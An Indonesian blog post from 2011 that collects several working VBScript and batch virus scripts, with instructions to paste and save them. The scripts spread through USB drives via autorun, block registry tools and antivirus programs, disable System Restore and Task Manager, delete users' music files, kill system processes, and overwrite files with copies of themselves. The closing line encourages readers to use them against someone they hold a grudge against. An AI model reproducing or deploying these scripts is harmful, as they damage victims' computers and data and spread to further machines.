Senin, 10 Oktober 2011

Kumpulan Script Virus

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next

extensi.vbs

————————-script begin————————–

On error resume next

Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd

‘Siapkan isi autorun atau bahasa kerennya make the autorun

Isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe vhck3d.vbs”

Set you = createobject(“scripting.filesystemobject”)

Set mf = you.getfile(wscript.scriptfullname)

Dim text,size

Size = mf.size

Check = mf.drive.drivetype

Set text = mf.openastextstream(1,-2)

Do while not text.atendofstream

Dini = dini & text.readline

Dini = dini & vbcrlf

Loop

Do

‘Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)

Set jatiya = you.getspecialfolder(1)

Set tf = you.getfile(jatiya & “hck3d.vbs”)

Tf.attributes = 32

Set tf = you.createtextfile(jatiya & “hck3d.vbs”,2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & “hck3d.vbs”)

Tf.attributes = 39

‘Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives

If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> “a:” then

Set tf=you.getfile(loph.path &”vhck3d.sys.vbs”)

Tf.attributes =32

Set tf=you.createtextfile(loph.path &”vhck3d.vbs”,2,true)

Tf.write dini

Tf.close

Set tf=you.getfile(loph.path &”vhck3d.vbs”)

Tf.attributes = 39

Set tf =you.getfile(loph.path &”autorun.inf”)

Tf.attributes = 32

Set tf=you.createtextfile(loph.path &”autorun.inf”,2,true)

Tf.write isi

Tf.close

Set tf = you.getfile(loph.path &”autorun.inf”)

Tf.attributes=39

End if

Next

‘Manipulasi registry

Set vhck3d = createobject(“wscript.shell”)

‘Banyak yang dirubah..liat ndiri deh aaah

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsmsconfig.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregedit.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregedt32.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregistryeditor.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionssetup.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsavscan.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsavcenter.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsashavast.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsansav.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsviremoval.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsviremover.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionspcmav-cln.exe.exedebugger”,””

Vhck3d.regwrite “hkey_local_machinesoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption”, “my loph dini”

Vhck3d.regwrite “hkey_local_machinesoftwarepoliciesmicrosoftwindowsinstallerlimitsystemrestorecheckpointing”, “1″, “reg_dword”

Vhck3d.regwrite “hkey_local_machinesoftwarepoliciesmicrosoftwindowsinstallerdisablemsi”, “1″, “reg_dword”

Vhck3d.regwrite “hkey_local_machinesoftwarepoliciesmicrosoftwindows ntsystemrestoredisablesr”, “1″, “reg_dword”

Vhck3d.regwrite “hkey_local_machinesoftwarepoliciesmicrosoftwindows ntsystemrestoredisableconfig”, “1″, “reg_dword”

If check <> 1 then

Wscript.sleep 200000

End if

Loop while check <> 1

Set sd = createobject(“wscript.shell”)

Sd.run i & “explorer.exe /e,/select, ” & wscript.scriptfullname

———————–end script—————————–

script extensi.bat

@echo off

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y

copy
nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke
.exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\ /y

copy nama_file(maksudnya file yang dibuat
dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan
file terserah pembuat).exe %systemdrive%\WINDOWS\ /y

copy
nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke
.exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\WINDOWS\system32\ /y

reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE
FROM LOCAL_HOST(judul title bar)” /f

reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR
COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f

reg add
“HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file
gambar pembuat).bmp /f

reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f

reg
add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file
gambar pembuat).bmp /f

reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v
nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya
file yang dibuat dengan flash lalu di publish ke .exe,atau file
exstensi lain,tampilan file terserah pembuat).exe /f

reg add
“HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau
kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)

extensi.bat

1 @Echo off
2 If not exist C:Data.bat Copy %0 C:Data.bat
3 If “%0”= =”C:Data.bat” Goto Buatreg
4 Start C:Data.bat
5 Goto Akhir

6 :Buatreg
7 If exist C:Data.reg Goto Proses
8 Echo Windows Registry Editor Version 5.00>Data.reg
9 Echo. >>C:Data.reg
10 Echo [HKEY_CLASSES_ROOTDirectoryshellDaftar]>>Data.reg
11 Echo. >>Data.reg
12 Echo [HKEY_CLASSES_ROOTDirectoryshellDaftarCommand]>>Data.reg
13 Echo @=”C:Data.bat”>>Data.reg
14 Start C:Data.reg
15 Goto Akhir

16 roses
17 If “%1”= =””Goto Akhir
18 Echo Daftar Nama file dalam Direktori %1 > C:Hasil.txt
19 Dir %1 >>C:Hasil.txt
20 Start C:Hasil.txt
21 :Akhir
22 Exit

lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)

extensi.vbs

On error resume next
Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner
set Regpen = CreateObject (“Wscript.Shell” )
set FSO = CreateObject (“Scripting. FileSystemObject “)
set Creator = FSO.CreateTextFile (“C:Ternate. vbs”, true)
Creator.WriteLine (“Msgbox (“& Chr (34) & “Salam Kenal dari Saya,
Mr.Dajjal :<” & chr (34)& “)”)
Creator.Close

Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies SystemNoRun” ,”1″,”REG_ DWORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies SystemDisableT askMgr”,” 1″,”RE G_DWORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies SystemDisableC MD”,”1″,” REG_DW ORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies Explorer NoFolderOption” ,”1″,” REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies Explorer NoDrives” ,”16″,”REG_ D WORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies Explorer NoSaveSettings” ,”1″,” REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies Explorer NoControlPanel” ,”1″,” REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies NoSetTaskbar” ,”1″,”REG_ DWORD”
Regpen.RegWrite “HKEY_CURRENT_ USERSoftware Microsoft WindowsCurr
entVersionPolicies Explorer Advanced HideFileExt” ,”1″,”REG_DWORD”
Regpen.Regwrite “HKEY_LOCAL_ MACHINESoftware Microsoft WindowsCur
rentVersion Winlogon LegalNoticeCapti on”, “THE Syaithan-X”
Regpen.RegWrite “HKEY_LOCAL_ MACHINESoftware Microsoft WindowsCur
rentVersion Winlogon LegalNoticeText” ,”ASSALAMUALA IKUM, YA AHLIL KUBUR”

Set Copier = FSO.GetFile (“C:Ternate. vbs”)
Copier.Copy (“C:Documents and SettingsAll UsersStart
MenuPrograms StartupAdobe. vbs”)

FSO.CreateFolder (“C:Program FilesMicrosoft 0fficeffice12″ )
FSO.CreateFolder (“D:Program” )
FSO.CreateFolder (“E:Program” )
FSO.CreateFolder (“F:Program” )
FSO.CreateFolder (“G:Program” )
FSO.CreateFolder (“H:Program” )
FSO.CreateFolder (“I:Program” )
FSO.CreateFolder (“J:Program” )
FSO.CreateFolder (“K:Program” )

Set Deleter = FSO.GetFile (“C:Windows System32 Restorerstrui. exe”)
Deleter.Move (“C:Program FilesMicrosoft 0fficeffice12 rstrui.Gnamu” )

set Dupler = FSO.GetFile (WScript.ScriptFull Name)
Dupler.Copy (“C:Program FilesMicrosof 0fficeffice12 Hantu.vbs” )
Dupler.Copy (“C:Documents and SettingsAll UsersStart
MenuPrograms StartupDesktop. ini.vbs”)
Dupler.Copy (“C:Documents and SettingsAll
UsersDesktop Dajjal_Antivirus .exe.vbs” )
Dupler.Copy (“C:Windows System32 Restorerstrui. exe.vbs”)
Dupler.Copy (“D:Program MotoGP_SETUP. vbs”)
Dupler.Copy (“E:Program TuneUp2009_ SETUP.vbs” )
Dupler.Copy (“F:Program Ansav_SETUP. vbs”)
Dupler.Copy (“G:Program DeltaForce_ SETUP.vbs” )
Dupler.Copy (“H:Program DeltaForce_ SETUP.vbs” )
Dupler.Copy (“I:Program Ansav_SETUP. vbs”)
Dupler.Copy (“J:Program Project.vbs” )
Dupler.Copy (“K:Program Hantu.vbs” )

Set Runner = WScript.CreateObjec t (“WScript.Shell” )
lalu simpan dengan extensi.vbs

extensi.bat

@echo off
title 40000688
color 4
cd %userprofile%Start MenuProgramsStartup
if exist “delete-this-virus.bat” goto start
if exist “Windows.bat” goto start
cd %userprofile%Desktop
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “%userprofile%Start MenuProgramsStartup”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “C:”
if exist “delete-this-virus.bat” del “delete-this-virus.bat”
cd %userprofile%My DocumentsMy Received Files
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “%userprofile%Start MenuProgramsStartup”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “C:”
if exist “delete-this-virus.bat” del “delete-this-virus.bat”
cd C:
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “%userprofile%Start MenuProgramsStartup”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “Windows.bat”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “HackandTrick.bat”
if exist “Windows.bat” copy “Windows.bat” “%userprofile%Start MenuProgramsStartup”
if exist “HackandTrick.bat” copy “HackandTrick.bat” “%userprofile%Start MenuProgramsStartup”
cls
:start
start http://meatspin.com
start http://onload.110mb.com/delete-this-virus.bat
start “40000688″
time 12:00
cd %userprofile%Desktop
if exist “*.*wav” del “*.*wav”
if exist “*.*Mp3″ del “*.*Mp3″
cd %userprofile%My DocumentsMy Music
if exist “*.*wav” del “*.*wav”
if exist “*.*Mp3″ del “*.*Mp3″
msg * Windows Security Center has Detected a Virus on your Computer
msg * Owned by 40000688
msg * 40000688
msg * 40000688
at 12:01 msg * 4000688 (c) HackandTrick
at 12:02 tskill firefox
at 12:02 tskill iexplore
at 12:04 msg * 40000688
at 12:06 msg * 40000688
tskill “ccApp”
start
tskill explorer

simpan sebagai extensi.bat

extensi.bat

@echo off
::virus H1N1
::Code in Gorontalo @ Juny 06 1990
::Using H1N1 tech
set r=set
set s=attrib
goto 4people
:1
%r% n=ren
%r% ok=*.bat
goto 2
:Gorontalo
%r% d=do
%r% k=copy
goto infek
:infek2
%v% %%a %sa% (%ri%) %d% %k% %0 “%%a”
goto 1
:2
%v% %%a %sa% (%ri%) %d% %n% %ri% %ok%
goto finish
:4people
%r% v=for
%r% sa=in
%r% ri=*.*
goto Gorontalo
:infek
%v% %%a %sa% (%ri%) %d% %s% “%%a” -s -r -h
goto infek2
:finish
pause
simpan extensi.bat
mungkin cma segini dlo la yang bisa saya kasih untuk kalian semuanya
dan saya harap script ini tidak di salah gunakan . Tapi kiranya anda ponya dendam dengan seseorang lancarkan aja deh biar si dia ngerasain apa yng di rasakan,

sumber :http://wawanmestica.blog.com/2010/04/03/kumpulan-script-virus/

Tidak ada komentar:

Posting Komentar